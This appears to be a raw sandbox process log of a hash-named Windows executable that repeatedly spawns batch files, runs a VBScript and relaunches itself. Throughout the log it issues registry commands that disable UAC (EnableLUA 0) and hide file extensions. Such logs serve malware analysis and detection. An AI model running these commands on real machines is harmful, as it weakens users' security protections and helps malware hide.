reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eWgUMwoE.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cOoIMYYI.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OOEYIgwg.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OKgQsgEk.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JKgMgQcc.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TKQAkAUo.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zkosQcAg.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DYgcoEss.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gWEMAkMU.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sCoEEEEo.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AQwMgsMs.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RmwkwMII.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XSsMEssE.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vkoYsscI.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YesIsAkw.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qYIUUokg.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CAsIwIAU.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hmMcsoMM.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DKIoIsUk.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

